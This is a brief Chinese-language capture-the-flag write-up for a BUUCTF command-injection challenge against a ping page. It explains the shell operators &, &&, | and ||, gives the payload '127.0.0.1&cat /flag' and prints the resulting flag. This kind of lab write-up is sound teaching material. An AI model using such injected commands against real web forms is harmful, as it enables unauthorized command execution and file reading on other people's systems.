Buuctf Exec
打开该靶机,发现该页面为一个ping页面
输入127.0.0.1测试,发现和电脑cmd上ping的结果差不多
分析一下ping小技巧
&,&&,|,|| 的区别:
- A&B:简单的拼接,A、B之间无制约关系
- A&&B:A执行成功,然后才会执行B
- A|B:A的输出,作为B的输入
- A||B:A执行失败,然后才会执行B
构造payload
127.0.0.1&cat /flag
得到该题的flag
flag{e166f81d-5663-4153-b837-c6484858bf25}本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!